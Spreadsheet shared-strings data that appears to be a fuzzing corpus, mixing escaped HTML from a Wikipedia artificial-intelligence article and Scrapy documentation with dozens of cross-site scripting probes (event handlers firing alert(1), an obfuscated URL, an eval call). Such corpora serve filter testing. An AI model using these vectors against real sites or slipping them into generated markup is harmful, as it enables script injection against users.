    <t>&lt;li&gt;&lt;a href="/wiki/Center_for_Human-Compatible_Artificial_Intelligence" title="Center for Human-Compatible Artificial Intelligence"&gt;Center for Human-Compatible Artificial Intelligence &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;hgroup onbeforecut="alert(1)" contenteditable&gt;test&lt;/hgroup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt;&lt;tr&gt;&lt;th scope="row" class="navbox-group" style="width:1%"&gt;Computer systems&lt;br /&gt;organization &lt;/th&gt;&lt;td class="navbox-list navbox-even" style="text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px"&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-3 tocsection-57"&gt;&lt;a href="#Artificial_moral_agents"&gt;&lt;span class="tocnumber"&gt;8.3.1 </t>
  </si>
  <si>
    <t>&lt;blink onblur=alert(1) tabindex=1 id=x&gt;&lt;/blink&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-20"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-20"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">  &lt;meta name="viewport" content="width=device-width, initial-scale=1.0"&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation book"&gt;Mead, Carver A.; Ismail, Mohammed (8 May 1989). &lt;a rel="nofollow" class="external text" href="http://fennetic.net/irc/Christopher%20R.%20Carroll%20Carver%20Mead%20Mohammed%20Ismail%20Analog%20VLSI%20Implementation%20of%20Neural%20Systems.pdf"&gt;&lt;i&gt;Analog VLSI Implementation of Neural Systems &lt;/i&gt; &lt;/a&gt; &lt;span class="cs1-format"&gt;(PDF) </t>
  </si>
  <si>
    <t>&lt;var onkeydown="alert(1)" contenteditable&gt;test&lt;/var&gt;</t>
  </si>
  <si>
    <t>&lt;style oncopy="alert(1)" contenteditable&gt;test&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;spacer id=x tabindex=1 onfocus=alert(1)&gt;&lt;/spacer&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">        &lt;dt&gt;Versions&lt;/dt&gt;        </t>
  </si>
  <si>
    <t>&lt;article onbeforecut="alert(1)" contenteditable&gt;test&lt;/article&gt;</t>
  </si>
  <si>
    <t>tt  p://6	6.000146.0x7.147/"&gt;&lt;/A&gt;</t>
  </si>
  <si>
    <t>&lt;noframes onpointerenter=alert(1)&gt;XSS&lt;/noframes&gt;</t>
  </si>
  <si>
    <t>&lt;article onbeforecopy="alert(1)" contenteditable&gt;test&lt;/article&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Convergence_(evolutionary_computing)" title="Convergence (evolutionary computing)"&gt;Convergence (evolutionary computing) &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;dialog onmousemove="alert(1)"&gt;test&lt;/dialog&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Mathematical_software" title="Mathematical software"&gt;Mathematical software &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Glossary_of_ecology" title="Glossary of ecology"&gt;Ecology &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;xmp id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/xmp&gt;</t>
  </si>
  <si>
    <t>&lt;strong onmouseup="alert(1)"&gt;test&lt;/strong&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;var id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/var&gt;</t>
  </si>
  <si>
    <t>&lt;output onmousemove="alert(1)"&gt;test&lt;/output&gt;</t>
  </si>
  <si>
    <t>&lt;s onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/s&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;big id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/big&gt;</t>
  </si>
  <si>
    <t>&lt;aside onmouseleave="alert(1)"&gt;test&lt;/aside&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">        &lt;div class="wy-menu wy-menu-vertical" data-spy="affix" role="navigation" aria-label="main navigation"&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;element id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/element&gt;</t>
  </si>
  <si>
    <t>&lt;frame onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/frame&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">				&lt;div class="magnify"&gt;&lt;a href="/wiki/File:Kismet_robot_at_MIT_Museum.jpg" class="internal" title="Enlarge"&gt; &lt;/a&gt; &lt;/div&gt;&lt;a href="/wiki/Kismet_(robot)" title="Kismet (robot)"&gt;Kismet &lt;/a&gt;, a robot with rudimentary social skills&lt;sup id="cite_ref-FOOTNOTE&amp;#39;&amp;#39;Kismet&amp;#39;&amp;#39;_136-0" class="reference"&gt;&lt;a href="#cite_note-FOOTNOTE&amp;#39;&amp;#39;Kismet&amp;#39;&amp;#39;-136"&gt;&amp;#91;133&amp;#93; &lt;/a&gt; &lt;/sup&gt; &lt;/div&gt; &lt;/div&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt;&lt;/dt&gt;&lt;dd&gt;Define the data you want to scrape.&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;audio onblur=alert(1) tabindex=1 id=x&gt;&lt;/audio&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;Algorithms have a host of applications in today's legal system already, assisting officials ranging from judges to parole officers and public defenders in gauging the predicted likelihood of recidivism of defendants.&lt;sup id="cite_ref-propublica.org_383-0" class="reference"&gt;&lt;a href="#cite_note-propublica.org-383"&gt;&amp;#91;372&amp;#93; &lt;/a&gt; &lt;/sup&gt; COMPAS (an acronym for Correctional Offender Management Profiling for Alternative Sanctions) counts among the most widely utilized commercially available solutions.&lt;sup id="cite_ref-propublica.org_383-1" class="reference"&gt;&lt;a href="#cite_note-propublica.org-383"&gt;&amp;#91;372&amp;#93; &lt;/a&gt; &lt;/sup&gt; It has been suggested that COMPAS assigns an exceptionally elevated risk of recidivism to black defendants while, conversely, ascribing low risk estimate to white defendants significantly more often than statistically expected.&lt;sup id="cite_ref-propublica.org_383-2" class="reference"&gt;&lt;a href="#cite_note-propublica.org-383"&gt;&amp;#91;372&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;div role="note" class="hatnote navigation-not-searchable"&gt;Main articles: &lt;a href="/wiki/Artificial_neural_network" title="Artificial neural network"&gt;Artificial neural network &lt;/a&gt; and &lt;a href="/wiki/Connectionism" title="Connectionism"&gt;Connectionism &lt;/a&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/head&gt;</t>
  </si>
  <si>
    <t>&lt;ins id=x tabindex=1 onactivate=alert(1)&gt;&lt;/ins&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">      &lt;li&gt;Scrapy 2.0 documentation&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;img alt="Category" src="//upload.wikimedia.org/wikipedia/en/thumb/4/48/Folder_Hexagonal_Icon.svg/16px-Folder_Hexagonal_Icon.svg.png" decoding="async" title="Category" width="16" height="14" srcset="//upload.wikimedia.org/wikipedia/en/thumb/4/48/Folder_Hexagonal_Icon.svg/24px-Folder_Hexagonal_Icon.svg.png 1.5x, //upload.wikimedia.org/wikipedia/en/thumb/4/48/Folder_Hexagonal_Icon.svg/32px-Folder_Hexagonal_Icon.svg.png 2x" data-file-width="36" data-file-height="31" /&gt; &lt;b&gt;&lt;a href="/wiki/Category:Robotics" title="Category:Robotics"&gt;Category &lt;/a&gt; &lt;/b&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;summary ondragover=alert(1) contenteditable&gt;drop here&lt;/summary&gt;</t>
  </si>
  <si>
    <t>&lt;dt draggable="true" ondragstart="alert(1)"&gt;test&lt;/dt&gt;</t>
  </si>
  <si>
    <t>&lt;dt onpointermove=alert(1)&gt;XSS&lt;/dt&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;map id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/map&gt;</t>
  </si>
  <si>
    <t>&lt;data onpointerup=alert(1)&gt;XSS&lt;/data&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Sam_Harris" title="Sam Harris"&gt;Sam Harris &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;input draggable="true" ondrag="alert(1)"&gt;test&lt;/input&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;Lombardo P, Boehm I, Nairz K (2020). "RadioComics – Santa Claus and the future of radiology". &lt;i&gt;Eur J Radiol &lt;/i&gt;. &lt;b&gt;122 &lt;/b&gt; (1): 108771. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1016%2Fj.ejrad.2019.108771"&gt;10.1016/j.ejrad.2019.108771 &lt;/a&gt;. &lt;a href="/wiki/PubMed_Identifier" class="mw-redirect" title="PubMed Identifier"&gt;PMID &lt;/a&gt;&amp;#160;&lt;a rel="nofollow" class="external text" href="//pubmed.ncbi.nlm.nih.gov/31835078"&gt;31835078 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Eur+J+Radiol&amp;amp;rft.atitle=RadioComics+%E2%80%93+Santa+Claus+and+the+future+of+radiology&amp;amp;rft.volume=122&amp;amp;rft.issue=1&amp;amp;rft.pages=108771&amp;amp;rft.date=2020&amp;amp;rft_id=info%3Adoi%2F10.1016%2Fj.ejrad.2019.108771&amp;amp;rft_id=info%3Apmid%2F31835078&amp;amp;rft.aulast=Lombardo&amp;amp;rft.aufirst=P&amp;amp;rft.au=Boehm%2C+I&amp;amp;rft.au=Nairz%2C+K&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;applet onpointerover=alert(1)&gt;XSS&lt;/applet&gt;</t>
  </si>
  <si>
    <t>&lt;input id=x onfocus=alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;frameset onmouseup="alert(1)"&gt;test&lt;/frameset&gt;</t>
  </si>
  <si>
    <t>&lt;caption draggable="true" ondragend="alert(1)"&gt;test&lt;/caption&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;element style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/element&gt;</t>
  </si>
  <si>
    <t>&lt;aside onpointerleave=alert(1)&gt;XSS&lt;/aside&gt;</t>
  </si>
  <si>
    <t>&lt;map onpointerout=alert(1)&gt;XSS&lt;/map&gt;</t>
  </si>
  <si>
    <t>&lt;font draggable="true" ondragend="alert(1)"&gt;test&lt;/font&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Abstract_and_concrete" title="Abstract and concrete"&gt;Abstract object &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;blockquote style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/blockquote&gt;</t>
  </si>
  <si>
    <t>&lt;p onmousemove="alert(1)"&gt;test&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;wbr style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/wbr&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;a href="/wiki/Prolog" title="Prolog"&gt;Prolog &lt;/a&gt;&lt;span class="nowrap"&gt;&amp;#160; </t>
  </si>
  <si>
    <t>&lt;base onmouseleave="alert(1)"&gt;test&lt;/base&gt;</t>
  </si>
  <si>
    <t>&lt;figure onbeforepaste="alert(1)" contenteditable&gt;test&lt;/figure&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite class="citation book"&gt;&lt;a href="/wiki/Richard_Neapolitan" title="Richard Neapolitan"&gt;Neapolitan, Richard &lt;/a&gt;; Jiang, Xia (2018). &lt;a rel="nofollow" class="external text" href="https://www.crcpress.com/Contemporary-Artificial-Intelligence-Second-Edition/Neapolitan-Jiang/p/book/9781138502383"&gt;&lt;i&gt;Artificial Intelligence: With an Introduction to Machine Learning &lt;/i&gt; &lt;/a&gt;. Chapman &amp;amp; Hall/CRC. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-1-138-50238-3" title="Special:BookSources/978-1-138-50238-3"&gt;&lt;bdi&gt;978-1-138-50238-3 &lt;/bdi&gt; &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=Artificial+Intelligence%3A+With+an+Introduction+to+Machine+Learning&amp;amp;rft.pub=Chapman+%26+Hall%2FCRC&amp;amp;rft.date=2018&amp;amp;rft.isbn=978-1-138-50238-3&amp;amp;rft.aulast=Neapolitan&amp;amp;rft.aufirst=Richard&amp;amp;rft.au=Jiang%2C+Xia&amp;amp;rft_id=https%3A%2F%2Fwww.crcpress.com%2FContemporary-Artificial-Intelligence-Second-Edition%2FNeapolitan-Jiang%2Fp%2Fbook%2F9781138502383&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>Expert systems:</t>
  </si>
  <si>
    <t>Planning and acting in non-deterministic domains: conditional planning, execution monitoring, replanning and continuous planning:</t>
  </si>
  <si>
    <t>&lt;bdi onbeforecut="alert(1)" contenteditable&gt;test&lt;/bdi&gt;</t>
  </si>
  <si>
    <t>&lt;header onpointerenter=alert(1)&gt;XSS&lt;/header&gt;</t>
  </si>
  <si>
    <t>&lt;spacer onpointerleave=alert(1)&gt;XSS&lt;/spacer&gt;</t>
  </si>
  <si>
    <t>&lt;source draggable="true" ondrag="alert(1)"&gt;test&lt;/source&gt;</t>
  </si>
  <si>
    <t>&lt;table onmousedown="alert(1)"&gt;test&lt;/table&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;rp style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/rp&gt;</t>
  </si>
  <si>
    <t>&lt;dd id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/dd&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>eval(a+b+c+d)</t>
  </si>
  <si>
    <t>&lt;animatemotion onpointerup=alert(1)&gt;XSS&lt;/animatemotion&gt;</t>
  </si>
  <si>
    <t>&lt;link rel="canonical" href="https://docs.scrapy.org/en/latest/" /&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Cross-validation_(statistics)" title="Cross-validation (statistics)"&gt;Cross-validation &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;template id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/template&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;center id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/center&gt;</t>
  </si>
  <si>
    <t>&lt;div role="navigation" aria-label="breadcrumbs navigation"&gt;</t>
  </si>
  <si>
    <t>&lt;noembed onpointerleave=alert(1)&gt;XSS&lt;/noembed&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;area ondrop=alert(1) contenteditable&gt;drop here&lt;/area&gt;</t>
  </si>
  <si>
    <t>&lt;select onmouseenter="alert(1)"&gt;test&lt;/select&gt;</t>
  </si>
  <si>
    <t>&lt;dir onclick="alert(1)"&gt;test&lt;/dir&gt;</t>
  </si>
  <si>
    <t>&lt;link onpointerover=alert(1)&gt;XSS&lt;/link&gt;</t>
  </si>
  <si>
    <t>&lt;thead onkeyup="alert(1)" contenteditable&gt;test&lt;/thead&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;/a&gt; &lt;/i&gt;&amp;#93; &lt;/sup&gt;, including &lt;a href="/wiki/Computer_vision" title="Computer vision"&gt;computer vision &lt;/a&gt;, &lt;a href="/wiki/Speech_recognition" title="Speech recognition"&gt;speech recognition &lt;/a&gt;, &lt;a href="/wiki/Natural_language_processing" title="Natural language processing"&gt;natural language processing &lt;/a&gt; and others.&lt;sup id="cite_ref-goodfellow2016_247-0" class="reference"&gt;&lt;a href="#cite_note-goodfellow2016-247"&gt;&amp;#91;236&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-HintonDengYu2012_248-0" class="reference"&gt;&lt;a href="#cite_note-HintonDengYu2012-248"&gt;&amp;#91;237&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-schmidhuber2015_246-1" class="reference"&gt;&lt;a href="#cite_note-schmidhuber2015-246"&gt;&amp;#91;235&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;plaintext onpointerout=alert(1)&gt;XSS&lt;/plaintext&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="/wiki/Seppo_Linnainmaa" title="Seppo Linnainmaa"&gt;Seppo Linnainmaa &lt;/a&gt; (1970). The representation of the cumulative rounding error of an algorithm as a Taylor expansion of the local rounding errors. Master's Thesis (in Finnish), Univ. Helsinki, 6–7. </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt;&lt;/dt&gt;&lt;dd&gt;Use &lt;a class="reference external" href="https://docs.python.org/3/library/asyncio.html#module-asyncio" title="(in Python v3.8)"&gt;&lt;code class="xref py py-mod docutils literal notranslate"&gt;&lt;span class="pre"&gt;asyncio</t>
  </si>
  <si>
    <t>&lt;area id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/area&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/System_on_a_chip" title="System on a chip"&gt;Systems on Chip (SoCs) &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFLugerStubblefield2004"&gt;Luger &amp;amp; Stubblefield 2004 &lt;/a&gt;, pp.&amp;#160;467–474, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;isindex draggable="true" ondrag="alert(1)"&gt;test&lt;/isindex&gt;</t>
  </si>
  <si>
    <t>&lt;mark id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/mark&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div class="plainlinks hlist navbar mini"&gt;&lt;ul&gt;&lt;li class="nv-view"&gt;&lt;a href="/wiki/Template:Emerging_technologies_in_information_and_communications" title="Template:Emerging technologies in information and communications"&gt;&lt;abbr title="View this template" style="text-align: center;;;background:none transparent;border:none;-moz-box-shadow:none;-webkit-box-shadow:none;box-shadow:none; padding:0;"&gt;v &lt;/abbr&gt; &lt;/a&gt; &lt;/li&gt;&lt;li class="nv-talk"&gt;&lt;a href="/wiki/Template_talk:Emerging_technologies_in_information_and_communications" title="Template talk:Emerging technologies in information and communications"&gt;&lt;abbr title="Discuss this template" style="text-align: center;;;background:none transparent;border:none;-moz-box-shadow:none;-webkit-box-shadow:none;box-shadow:none; padding:0;"&gt;t &lt;/abbr&gt; &lt;/a&gt; &lt;/li&gt;&lt;li class="nv-edit"&gt;&lt;a class="external text" href="https://en.wikipedia.org/w/index.php?title=Template:Emerging_technologies_in_information_and_communications&amp;amp;action=edit"&gt;&lt;abbr title="Edit this template" style="text-align: center;;;background:none transparent;border:none;-moz-box-shadow:none;-webkit-box-shadow:none;box-shadow:none; padding:0;"&gt;e &lt;/abbr&gt; &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;article oncontextmenu="alert(1)"&gt;test&lt;/article&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Mating_pool" title="Mating pool"&gt;Mating pool &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;summary draggable="true" ondragend="alert(1)"&gt;test&lt;/summary&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Mobile_translation" title="Mobile translation"&gt;Mobile translation &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;A HREF="//www.google.com/"&gt;&lt;/A&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;a href="/wiki/Knowledge_representation" class="mw-redirect" title="Knowledge representation"&gt;Knowledge representation &lt;/a&gt;&lt;sup id="cite_ref-Knowledge_representation_91-0" class="reference"&gt;&lt;a href="#cite_note-Knowledge_representation-91"&gt;&amp;#91;88&amp;#93; &lt;/a&gt; &lt;/sup&gt; and &lt;a href="/wiki/Knowledge_engineering" title="Knowledge engineering"&gt;knowledge engineering &lt;/a&gt;&lt;sup id="cite_ref-Knowledge_engineering_92-0" class="reference"&gt;&lt;a href="#cite_note-Knowledge_engineering-92"&gt;&amp;#91;89&amp;#93; &lt;/a&gt; &lt;/sup&gt; are central to classical AI research. Some "expert systems" attempt to gather together explicit knowledge possessed by experts in some narrow domain. In addition, some projects attempt to gather the "commonsense knowledge" known to the average person into a database containing extensive knowledge about the world. Among the things a comprehensive commonsense knowledge base would contain are: objects, properties, categories and relations between objects;&lt;sup id="cite_ref-Representing_categories_and_relations_93-0" class="reference"&gt;&lt;a href="#cite_note-Representing_categories_and_relations-93"&gt;&amp;#91;90&amp;#93; &lt;/a&gt; &lt;/sup&gt; situations, events, states and time;&lt;sup id="cite_ref-Representing_time_94-0" class="reference"&gt;&lt;a href="#cite_note-Representing_time-94"&gt;&amp;#91;91&amp;#93; &lt;/a&gt; &lt;/sup&gt; causes and effects;&lt;sup id="cite_ref-Representing_causation_95-0" class="reference"&gt;&lt;a href="#cite_note-Representing_causation-95"&gt;&amp;#91;92&amp;#93; &lt;/a&gt; &lt;/sup&gt; knowledge about knowledge (what we know about what other people know);&lt;sup id="cite_ref-Representing_knowledge_about_knowledge_96-0" class="reference"&gt;&lt;a href="#cite_note-Representing_knowledge_about_knowledge-96"&gt;&amp;#91;93&amp;#93; &lt;/a&gt; &lt;/sup&gt; and many other, less well researched domains. A representation of "what exists" is an &lt;a href="/wiki/Ontology_(computer_science)" class="mw-redirect" title="Ontology (computer science)"&gt;ontology &lt;/a&gt;: the set of objects, relations, concepts, and properties formally described so that software agents can interpret them. The &lt;a href="/wiki/Semantics" title="Semantics"&gt;semantics &lt;/a&gt; of these are captured as &lt;a href="/wiki/Description_logic" title="Description logic"&gt;description logic &lt;/a&gt; concepts, roles, and individuals, and typically implemented as classes, properties, and individuals in the &lt;a href="/wiki/Web_Ontology_Language" title="Web Ontology Language"&gt;Web Ontology Language &lt;/a&gt;.&lt;sup id="cite_ref-97" class="reference"&gt;&lt;a href="#cite_note-97"&gt;&amp;#91;94&amp;#93; &lt;/a&gt; &lt;/sup&gt; The most general ontologies are called &lt;a href="/wiki/Upper_ontology" title="Upper ontology"&gt;upper ontologies &lt;/a&gt;, which attempt to provide a foundation for all other knowledge&lt;sup id="cite_ref-Ontology_98-0" class="reference"&gt;&lt;a href="#cite_note-Ontology-98"&gt;&amp;#91;95&amp;#93; &lt;/a&gt; &lt;/sup&gt; by acting as mediators between &lt;a href="/wiki/Domain_ontology" class="mw-redirect" title="Domain ontology"&gt;domain ontologies &lt;/a&gt; that cover specific knowledge about a particular knowledge domain (field of interest or area of concern). Such formal knowledge representations can be used in content-based indexing and retrieval,&lt;sup id="cite_ref-99" class="reference"&gt;&lt;a href="#cite_note-99"&gt;&amp;#91;96&amp;#93; &lt;/a&gt; &lt;/sup&gt; scene interpretation,&lt;sup id="cite_ref-100" class="reference"&gt;&lt;a href="#cite_note-100"&gt;&amp;#91;97&amp;#93; &lt;/a&gt; &lt;/sup&gt; clinical decision support,&lt;sup id="cite_ref-101" class="reference"&gt;&lt;a href="#cite_note-101"&gt;&amp;#91;98&amp;#93; &lt;/a&gt; &lt;/sup&gt; knowledge discovery (mining "interesting" and actionable inferences from large databases),&lt;sup id="cite_ref-102" class="reference"&gt;&lt;a href="#cite_note-102"&gt;&amp;#91;99&amp;#93; &lt;/a&gt; &lt;/sup&gt; and other areas.&lt;sup id="cite_ref-103" class="reference"&gt;&lt;a href="#cite_note-103"&gt;&amp;#91;100&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;output onmouseup="alert(1)"&gt;test&lt;/output&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;In the 1940s and 1950s, a number of researchers explored the connection between &lt;a href="/wiki/Neurobiology" class="mw-redirect" title="Neurobiology"&gt;neurobiology &lt;/a&gt;, &lt;a href="/wiki/Information_theory" title="Information theory"&gt;information theory &lt;/a&gt;, and &lt;a href="/wiki/Cybernetics" title="Cybernetics"&gt;cybernetics &lt;/a&gt;. Some of them built machines that used electronic networks to exhibit rudimentary intelligence, such as &lt;a href="/wiki/W._Grey_Walter" class="mw-redirect" title="W. Grey Walter"&gt;W. Grey Walter &lt;/a&gt;'s &lt;a href="/wiki/Turtle_(robot)" title="Turtle (robot)"&gt;turtles &lt;/a&gt; and the &lt;a href="/wiki/Johns_Hopkins_Beast" title="Johns Hopkins Beast"&gt;Johns Hopkins Beast &lt;/a&gt;. Many of these researchers gathered for meetings of the Teleological Society at &lt;a href="/wiki/Princeton_University" title="Princeton University"&gt;Princeton University &lt;/a&gt; and the &lt;a href="/wiki/Ratio_Club" title="Ratio Club"&gt;Ratio Club &lt;/a&gt; in England.&lt;sup id="cite_ref-AI&amp;#39;s_immediate_precursors_156-0" class="reference"&gt;&lt;a href="#cite_note-AI&amp;#39;s_immediate_precursors-156"&gt;&amp;#91;153&amp;#93; &lt;/a&gt; &lt;/sup&gt; By 1960, this approach was largely abandoned, although elements of it would be revived in the 1980s.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFJackson1985" class="citation book"&gt;&lt;a href="/w/index.php?title=Philip_C._Jackson,_Jr.&amp;amp;action=edit&amp;amp;redlink=1" class="new" title="Philip C. Jackson, Jr. (page does not exist)"&gt;Jackson, Philip &lt;/a&gt; (1985). &lt;span class="cs1-lock-registration" title="Free registration required"&gt;&lt;a rel="nofollow" class="external text" href="https://archive.org/details/introductiontoar1985jack"&gt;&lt;i&gt;Introduction to Artificial Intelligence &lt;/i&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;meter onkeyup="alert(1)" contenteditable&gt;test&lt;/meter&gt;</t>
  </si>
  <si>
    <t>&lt;li onmouseout="alert(1)"&gt;test&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/History_of_science" title="History of science"&gt;History of science &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;time id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/time&gt;</t>
  </si>
  <si>
    <t>&lt;img id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/img&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">      &lt;/div&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=59" title="Edit section: Malevolent and friendly AI"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;nobr onpaste="alert(1)" contenteditable&gt;test&lt;/nobr&gt;</t>
  </si>
  <si>
